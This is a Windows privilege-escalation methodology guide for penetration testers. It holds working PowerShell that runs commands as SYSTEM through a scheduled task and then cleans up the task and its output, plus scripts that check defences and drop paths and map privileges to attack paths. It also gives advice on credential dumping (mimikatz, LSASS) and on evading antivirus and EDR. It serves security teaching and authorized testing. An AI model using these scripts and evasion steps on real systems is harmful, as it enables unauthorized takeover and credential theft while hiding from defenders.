
Windows Privilege Escalation

Windows privilege escalation is a loop: enumerate the local environment exhaustively, identify a misconfiguration or token/group privilege that maps to a known escalation primitive, exploit it, repeat if the new context isn’t yet your goal. The target hierarchy is NT AUTHORITY\SYSTEM (highest, ~“root-equivalent”), local Administrator, then domain-privileged accounts (Domain Admin, Enterprise Admin) reachable via stored credentials or token theft.

```powershell
# 1. Situational awareness - where are we?
whoami /priv
whoami /groups
ipconfig /all
route print
systeminfo
wmic qfe                            # deprecated on current builds; Get-HotFix is the PowerShell equivalent
tasklist /svc
netstat -ano
net user
net localgroup
net localgroup administrators

# 2. Tool-driven enumeration - find what manual missed
.\winPEASx64.exe                    # comprehensive checks, very verbose
.\Seatbelt.exe -group=all           # focused, structured output
. .\PowerUp.ps1; Invoke-AllChecks   # PowerShell, classic
.\SharpUp.exe audit                 # PowerUp C# port
.\watson.exe                        # KB-based missing-patch matcher

# 3. Match findings to escalation primitives - by category
# Token privileges  → SeImpersonate, SeDebug, SeBackup, SeRestore, SeTakeOwnership
# Group memberships → Backup Operators, DnsAdmins, Hyper-V Admins, Server Operators
# OS vulns          → Missing KBs, kernel exploits (PrintNightmare, HiveNightmare)
# Misconfigurations → Weak service ACLs, unquoted paths, AlwaysInstallElevated
# Cred hunting      → Config files, registry, browser stores, password managers
```

Success indicator: whoami returns nt authority\system or a member of BUILTIN\Administrators, or stored credentials yield a domain-privileged account.

| Account | Privileges | How to recognize | What it unlocks |
|---|---|---|---|
| NT AUTHORITY\SYSTEM | Highest; can read all process memory, all files, all registry | `whoami` returns `nt authority\system` | Local account hashes from the SAM via mimikatz, cached domain credentials, any local file |
| Local Administrator | Full control of the local box | Member of BUILTIN\Administrators | Service installation, HKLM registry write, scheduled tasks as SYSTEM (one step from SYSTEM) |
| Other local admin | Same as Local Administrator | Other account in BUILTIN\Administrators | Same as above |
| Domain user, local admin | Local admin + domain identity | Domain user in BUILTIN\Administrators | Lateral movement via PsExec, WMI, WinRM to other domain hosts |
| Domain Admin / Enterprise Admin | Full control of AD | Member of Domain Admins / Enterprise Admins | Domain compromise - DC access, NTDS.dit dump, all domain accounts |

The progression isn’t strict. Often you land in a service account context (low-privileged but with SeImpersonate) and the easiest path is directly to SYSTEM via potato-family attacks - skipping over Administrator entirely.

SYSTEM is the “root-equivalent” account on Windows. It can:

  • Read any file regardless of ACL (including the SAM and SYSTEM hives under C:\Windows\System32\config, which hold local credentials; they are locked while Windows runs, so they are read via `reg save` or a shadow copy rather than copied directly)
  • Read process memory of any process including LSASS (which holds plaintext credentials and Kerberos tickets)
  • Modify any registry key
  • Install services
  • Impersonate any other logged-on user

Local Administrator can do most of this too, but only from an elevated token (UAC consent, or a UAC bypass); SYSTEM is never subject to UAC. For automation and stealth, SYSTEM is preferred.
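The table above calls scheduled tasks "one step from SYSTEM". As an added example (not code from the original page), here is that step in PowerShell: a one-shot scheduled task registered with the SYSTEM principal, started, polled to completion, and removed. It assumes an already elevated (high-integrity) admin session; the function name, task-name prefix and output path are this example's own choices.

```powershell
# Added example, not from the original page: run a command line as NT AUTHORITY\SYSTEM from an
# elevated local admin session via a one-shot scheduled task. From a UAC-filtered
# (medium-integrity) admin token Register-ScheduledTask fails with "Access is denied";
# elevate or bypass UAC first. Function, task and file names are this example's own.
function Invoke-AsSystem {
    param(
        [Parameter(Mandatory)] [string]$CommandLine,                   # handed to cmd.exe /c
        [string]$TaskName = 'once-' + [guid]::NewGuid().ToString('N').Substring(0, 8),
        [string]$OutFile  = (Join-Path $env:TEMP 'as-system.txt'),     # caller's profile: caller can read what SYSTEM wrote
        [int]$TimeoutSec  = 30
    )
    # SYSTEM's process has no handle to this console, so stdout/stderr are captured via a file redirect.
    $action    = New-ScheduledTaskAction -Execute 'cmd.exe' -Argument "/c $CommandLine > `"$OutFile`" 2>&1"
    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
    $null = Register-ScheduledTask -TaskName $TaskName -Action $action -Principal $principal -Force
    try {
        Start-ScheduledTask -TaskName $TaskName
        # LastTaskResult 0x41303 (267011) = has not yet run, 0x41301 (267009) = currently running.
        # Poll until it is neither, or until the timeout expires.
        $deadline = (Get-Date).AddSeconds($TimeoutSec)
        do {
            Start-Sleep -Milliseconds 500
            $info = Get-ScheduledTaskInfo -TaskName $TaskName
        } while (($info.LastTaskResult -in @(267011, 267009)) -and ((Get-Date) -lt $deadline))
        [pscustomobject]@{
            TaskName = $TaskName
            ExitCode = $info.LastTaskResult                         # 0 when the command exited cleanly
            Output   = $(if (Test-Path $OutFile) { Get-Content $OutFile -Raw } else { $null })
        }
    } finally {
        # The task (Security event 4698 if object-access auditing covers task creation) and the
        # output file are both artifacts: remove them even if the command failed.
        Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
        Remove-Item $OutFile -Force -ErrorAction SilentlyContinue
    }
}

# Step 4 of the loop: prove the context actually changed.
$run = Invoke-AsSystem -CommandLine 'whoami /all'
$run.Output
```

The output file lands in the caller's `%TEMP%` so that a file created by SYSTEM inherits an ACL the caller can read; if you are on a domain account with a roaming profile, point `-OutFile` somewhere outside the profile. The task itself is the loud part: task creation and deletion are logged when task auditing is on, and EDRs watch for SYSTEM tasks that launch `cmd.exe`.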

Privilege escalation isn’t a single technique - it’s a methodology applied iteratively. The loop:

┌──────────────────────────────────────────────────────────┐
│ 1. Enumerate (manual + tools)                            │
│    - System info, patches, installed software            │
│    - User privileges, group memberships                  │
│    - Services, scheduled tasks, file ACLs                │
│    - Network state, running processes, named pipes       │
├──────────────────────────────────────────────────────────┤
│ 2. Identify (pattern match against primitives)           │
│    - Token privilege? → potato-family or token abuse     │
│    - Group membership? → group-specific attack path      │
│    - Missing patch? → kernel exploit                     │
│    - Weak ACL? → service binary / registry / file        │
│    - Stored credentials? → reuse for higher context      │
├──────────────────────────────────────────────────────────┤
│ 3. Exploit (one primitive at a time)                     │
│    - Verify the prerequisite holds                       │
│    - Test in lab first if non-destructive isn't certain  │
│    - Document baseline → action → result                 │
├──────────────────────────────────────────────────────────┤
│ 4. Verify (did the context change?)                      │
│    - `whoami` to confirm new identity                    │
│    - If still low-priv, return to step 1                 │
│    - If SYSTEM/admin, pivot to credential harvesting     │
└──────────────────────────────────────────────────────────┘

A typical engagement runs this loop 2-5 times: foothold → service account → SYSTEM. Or foothold → local admin via stored creds → domain user via lateral move → domain admin via Kerberoasting. The pattern repeats; the specific primitives change.

Manual enumeration is essential - tools fail, get blocked by AV, and sometimes return false positives - but running a script in 30 seconds beats running 50 commands in 20 minutes. Use both.

| Tool | Language | Focus | Notes |
|---|---|---|---|
| winPEAS | .NET / bat | All-around, very thorough | Extremely verbose; great as a "first pass" |
| Seatbelt | C# | Focused, structured | Cleaner output than winPEAS; `-group=` flag for targeted runs |
| PowerUp | PowerShell | Service / file / registry misconfigs | Classic; `Invoke-AllChecks` covers most paths |
| SharpUp | C# | PowerUp port | Less feature-complete than PowerUp; useful when PowerShell is constrained |
| JAWS | PowerShell | PowerShell 2.0 compatible | For very old Windows (Server 2008) where modern tools fail |
| Watson | .NET | Missing-KB → exploit matcher | Output: "you're missing KBxxxxx, try CVE-yyyy" |
| Windows-Exploit-Suggester (WES-NG) | Python | Same role, runs on the attacker side | Feed it `systeminfo` output |
| Sherlock | PowerShell | Missing-KB matcher (older) | Predates Watson; works on Win7 / Server 2008 |
| Tool | Purpose |
|---|---|
| LaZagne | Pulls saved credentials from browsers, mail clients, wifi, DPAPI, etc. |
| SessionGopher | Saved sessions: PuTTY, WinSCP, FileZilla, SuperPuTTY, RDP |
| SharpChrome | Chrome cookies and saved logins via DPAPI |
| Mimikatz | The canonical credential dumper |

Sysinternals Suite - Microsoft-signed, generally unflagged by AV:

| Binary | Purpose |
|---|---|
| accesschk | DACL inspection: services, named pipes, registry keys, files |
| pipelist | Named pipe enumeration |
| psservice | Service info / control |
| procdump | Process memory dumping (LSASS in particular) |
| procmon | Live filesystem / registry / process monitoring |
| Autoruns | Persistence-location enumeration |

For each engagement, prefer compiling from source if possible to avoid AV signatures matching public binaries. When compilation isn’t an option, Ghostpack-CompiledBinaries hosts pre-built Seatbelt / SharpUp / Rubeus / etc.

When uploading tools to a target, C:\Windows\Temp\ is reliably writable by BUILTIN\Users (Users hold create-file and traverse rights there but not list, so other users' files are invisible to you as well) and is often missed by file-monitoring rules that focus on user profile paths. C:\ProgramData\ is another option. Avoid C:\Users\Public\ (often monitored), and don't drop into your own profile when you log on with a domain account that has a roaming profile: it syncs back to the server.

The reality of modern Windows enterprises:

| Defense | What it does | Operator impact |
|---|---|---|
| Windows Defender (default AV) | Real-time signature scanning + cloud lookups | Almost every public tool is signatured; renaming alone is not enough, obfuscate or recompile |
| Microsoft Defender for Endpoint (EDR) | Behavioral detection: process injection, LSASS access, named-pipe patterns | Loud tools (mimikatz, procdump) trigger alerts |
| CrowdStrike Falcon / Cylance / SentinelOne | Behavior + ML-based EDR | Public tooling almost certainly flagged |
| AppLocker | Allow-listing: blocks unauthorized binaries, scripts, installers | Constrains where tools can run from |
| WDAC / Device Guard | Kernel-enforced code-integrity policy; stronger than AppLocker | Tougher to bypass |
| PowerShell Constrained Language Mode | Restricts PowerShell to a safe subset (no Add-Type, .NET method calls or COM) | Most attack scripts fail |
| AMSI | Hands script content to the installed AV at execution time, after any runtime decoding | Blocks flagged scripts before they run; string obfuscation alone is not enough |

The escalation paths in this cluster largely work in a hardened environment when correctly executed - but the tool drops, binary executions, and PowerShell invocations may trip alerts. Operational considerations:

  • Use built-in commands first (whoami, netstat, sc, reg query) - no AV signature fires on them, though process-creation auditing (event 4688 with command-line logging, Sysmon) still records every invocation
  • Modify tools before use - change strings, function names, compile fresh
  • Prefer manual techniques when tool detections are too risky
  • Read AppLocker policies first (Get-AppLockerPolicy -Effective) before assuming you can run an .exe from C:\Windows\Temp\

When the engagement explicitly authorizes “loud” testing (configuration audit, not evasive red team), use the public tools directly. When evasion matters, expect to spend significant effort on tradecraft before any escalation primitive runs.
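An added example, not from the original page, that turns the orientation advice above into two checks. `Get-DefensePosture` reports the PowerShell language mode, Defender's real-time and tamper-protection state, the AppLocker Exe enforcement mode from the effective policy, and any running EDR agent processes; `Test-DropPath` probes the candidate drop directories by actually writing a file (inspecting the DACL alone misses deny entries and inherited rules) and, when an AppLocker policy exists, asks `Test-AppLockerPolicy` whether an `.exe` at that path would run for the current user. The function names and the EDR process-name list are this example's assumptions.

```powershell
# Added example, not from the original page: orient before any tool drop or execution.
# Function names and the EDR process-name list are this example's own assumptions.
function Get-DefensePosture {
    # Constrained Language Mode blocks Add-Type, most .NET method calls and COM: check it first.
    $languageMode = $ExecutionContext.SessionState.LanguageMode

    # Defender's own cmdlets; absent or access-denied when a third-party AV owns the box.
    $mp = $null
    try { $mp = Get-MpComputerStatus -ErrorAction Stop } catch { }

    # Effective AppLocker policy (local + GPO) as XML. EnforcementMode on the Exe collection is
    # what decides whether a dropped .exe runs: NotConfigured / AuditOnly / Enabled.
    $exeMode = 'NotConfigured'
    try {
        $xml = [xml](Get-AppLockerPolicy -Effective -Xml -ErrorAction Stop)
        $exe = $xml.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Exe' }
        if ($exe) { $exeMode = $exe.EnforcementMode }
    } catch { }

    # Common EDR agent process names (assumed list: MDE, CrowdStrike, SentinelOne, Cylance).
    $edr    = 'MsSense', 'CSFalconService', 'SentinelAgent', 'CylanceSvc'
    $agents = Get-Process -Name $edr -ErrorAction SilentlyContinue |
              Select-Object -ExpandProperty Name -Unique

    [pscustomobject]@{
        LanguageMode       = $languageMode
        RealTimeProtection = $(if ($mp) { $mp.RealTimeProtectionEnabled } else { 'unknown' })
        TamperProtection   = $(if ($mp) { $mp.IsTamperProtected } else { 'unknown' })
        AppLockerExe       = $exeMode
        EdrAgents          = ($agents -join ', ')
    }
}

function Test-DropPath {
    param([string[]]$Candidates = @('C:\Windows\Temp', 'C:\ProgramData', 'C:\Users\Public', $env:TEMP))
    $me     = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    $policy = $null
    try { $policy = Get-AppLockerPolicy -Effective -ErrorAction Stop } catch { }
    foreach ($dir in $Candidates) {
        $writable = $false; $decision = 'n/a'
        # Probe by writing, not by reading the DACL: deny ACEs, mandatory labels and inherited
        # rules higher up the tree are all settled by the real access check.
        $probe = Join-Path $dir ([IO.Path]::GetRandomFileName() + '.exe')
        try {
            [IO.File]::WriteAllText($probe, 'probe')
            $writable = $true
            if ($policy) {
                # Would an .exe at this path run for us? The stub is not a real PE, so only path
                # rules answer meaningfully; hash and publisher rules need the real binary.
                $decision = (Test-AppLockerPolicy -PolicyObject $policy -Path $probe -User $me).PolicyDecision
            }
        } catch { }
        finally { Remove-Item $probe -Force -ErrorAction SilentlyContinue }
        [pscustomobject]@{ Path = $dir; Writable = $writable; AppLocker = $decision }
    }
}

Get-DefensePosture
Test-DropPath | Format-Table -AutoSize
```

The probe is itself a file write of a `.exe` name into monitored locations, so on an evasive engagement run `Get-DefensePosture` first and only probe the one or two paths you intend to use. An AppLocker decision of `Allowed` or `AllowedByDefault` for a path rule says nothing about what Defender or the EDR will do with the real binary once it lands.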

| Page | Focus |
|---|---|
| Situational awareness | Network/AV/AppLocker enumeration - orienting before action |
| Initial enumeration | System info, patches, users/groups, processes, network state |
| Named pipes | Enumerating IPC channels and the writable-pipe attack pattern |
| SeImpersonate | Token abuse: JuicyPotato, PrintSpoofer, RoguePotato for service-account-to-SYSTEM |
| SeDebugPrivilege | LSASS memory dump + mimikatz, child-process inheritance |
| SeTakeOwnership | Reading sensitive files via ownership-then-DACL-modify |
| Backup Operators | SeBackup/SeRestore for NTDS.dit dump and registry hive extraction |
| DnsAdmins | DNS plugin DLL injection on Domain Controllers |
| Other privileged groups | Event Log Readers, Hyper-V Admins, Print Operators, Server Operators |

Subsequent rounds will cover OS attacks (UAC bypass, weak service ACLs, kernel exploits, DLL injection), credential hunting (config files, registry, browsers, password managers), restricted environments (Citrix breakout, kiosks), and miscellaneous techniques (LOLBAS, AlwaysInstallElevated, scheduled task abuse, VHDX mounting, EOL system attacks).

For a standard “low-privileged shell, escalate to SYSTEM” task:

  1. Confirm context - whoami, whoami /priv, whoami /groups. Three lines tell you 80% of what’s possible.
  2. Quick-check privileged tokens - if any of SeImpersonate, SeAssignPrimaryToken, SeBackup, SeRestore, SeDebug, SeTakeOwnership, SeLoadDriver appears in whoami /priv at all, jump directly to that page in this cluster. The State column only says whether the privilege is currently enabled; a Disabled one is still held and can be switched on with AdjustTokenPrivileges
  3. Group membership - whoami /groups and net localgroup. Any of Backup Operators, DnsAdmins, Hyper-V Administrators, Print Operators, Server Operators, or Event Log Readers: jump to the relevant page
  4. System version & patches - systeminfo → feed to WES-NG or run Watson locally. Match missing KBs to public exploits
  5. Service / file ACL audit - accesschk, winPEAS and PowerUp all look for weak permissions on service binaries, their directories and registry keys
  6. Credential hunting - only if the above fail; covered in a later round

The order matters because each step is cheaper than the next. A whoami /priv check is one command and reveals JuicyPotato-style wins instantly; a full file-system credential hunt is hours of work and the lowest-value lookup.
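Steps 1 to 3 of that checklist, and the category matching at the end of the quick-reference block at the top of the page, are mechanical enough to script. The following is an added example, not code from the original page: `whoami` accepts `/FO CSV`, so its privilege and group tables parse with `ConvertFrom-Csv` and can be matched against the primitives this page lists. Groups are keyed by well-known SID so localized group names do not matter (DnsAdmins is a domain group with a per-domain RID, so it is matched by name). The function name, the lead text and the sample output are this example's own; the sample is constructed, not captured from a real host.

```powershell
# Added example, not from the original page: automate checklist steps 1-3 by parsing
# `whoami /priv /fo csv` and `whoami /groups /fo csv`. Names and lead text are this example's own.

# Token privileges that map to a known primitive (canonical Se* constant names).
$PrivilegeLeads = @{
    'SeImpersonatePrivilege'        = 'JuicyPotato / PrintSpoofer / RoguePotato to SYSTEM'
    'SeAssignPrimaryTokenPrivilege' = 'Potato family (assign the stolen token to a new process)'
    'SeDebugPrivilege'              = 'Open any process: LSASS dump, inherit a SYSTEM handle'
    'SeBackupPrivilege'             = 'Read any file or hive regardless of DACL (SAM, SYSTEM, NTDS.dit)'
    'SeRestorePrivilege'            = 'Write any file or registry key regardless of DACL'
    'SeTakeOwnershipPrivilege'      = 'Take ownership, then rewrite the DACL'
    'SeLoadDriverPrivilege'         = 'Load a vulnerable signed driver into the kernel'
}

# Privileged groups by well-known SID; localized names do not matter this way.
$GroupLeads = @{
    'S-1-5-32-544' = 'Administrators - already local admin, next stop SYSTEM'
    'S-1-5-32-551' = 'Backup Operators - SeBackup/SeRestore: hive and NTDS.dit extraction'
    'S-1-5-32-549' = 'Server Operators - service and file control on a DC'
    'S-1-5-32-550' = 'Print Operators - SeLoadDriver on a DC'
    'S-1-5-32-578' = 'Hyper-V Administrators - VM disk and hard-link abuse on a Hyper-V host'
    'S-1-5-32-573' = 'Event Log Readers - Security log (credentials in logged command lines)'
}

function Get-EscalationLeads {
    param(
        [string[]]$PrivCsv  = (whoami /priv /fo csv),
        [string[]]$GroupCsv = (whoami /groups /fo csv)
    )
    $leads = @()
    foreach ($p in ($PrivCsv | ConvertFrom-Csv)) {
        $name = $p.'Privilege Name'
        if ($PrivilegeLeads.ContainsKey($name)) {
            # State only says whether the privilege is currently enabled. A Disabled privilege is
            # still held and can be switched on with AdjustTokenPrivileges, so it is a lead too.
            $leads += [pscustomobject]@{ Kind = 'Privilege'; Name = $name; Detail = $p.State; Lead = $PrivilegeLeads[$name] }
        }
    }
    foreach ($g in ($GroupCsv | ConvertFrom-Csv)) {
        $name = $g.'Group Name'; $sid = $g.SID; $lead = $null
        if ($GroupLeads.ContainsKey($sid)) { $lead = $GroupLeads[$sid] }
        elseif ($name -like '*\DnsAdmins') { $lead = 'DnsAdmins - DNS plugin DLL on a DC' }   # domain group, RID varies
        if ($lead) {
            # A UAC-filtered admin token lists Administrators as "Group used for deny only":
            # admin on paper, but a UAC bypass or consent prompt is needed before it counts.
            $detail = if ($g.Attributes -match 'deny only') { 'FILTERED (deny-only)' } else { 'effective' }
            $leads += [pscustomobject]@{ Kind = 'Group'; Name = $name; Detail = $detail; Lead = $lead }
        }
    }
    $leads
}

# Constructed sample (not real output): a service account holding SeImpersonate and a
# disabled SeBackup, in Backup Operators, with a UAC-filtered Administrators membership.
$samplePriv = @'
"Privilege Name","Description","State"
"SeChangeNotifyPrivilege","Bypass traverse checking","Enabled"
"SeImpersonatePrivilege","Impersonate a client after authentication","Enabled"
"SeBackupPrivilege","Back up files and directories","Disabled"
'@ -split "`r?`n"

$sampleGroups = @'
"Group Name","Type","SID","Attributes"
"Everyone","Well-known group","S-1-1-0","Mandatory group, Enabled by default, Enabled group"
"BUILTIN\Backup Operators","Alias","S-1-5-32-551","Mandatory group, Enabled by default, Enabled group"
"BUILTIN\Administrators","Alias","S-1-5-32-544","Group used for deny only"
'@ -split "`r?`n"

Get-EscalationLeads -PrivCsv $samplePriv -GroupCsv $sampleGroups | Format-Table -AutoSize
# On the target, with no arguments, it runs whoami itself:
# Get-EscalationLeads | Format-Table -AutoSize
```

On the constructed sample this returns four leads: SeImpersonate (Enabled), SeBackup (Disabled but held), Backup Operators (effective), and Administrators marked FILTERED, which is the situation where the cheapest path is a UAC bypass rather than any of the other primitives.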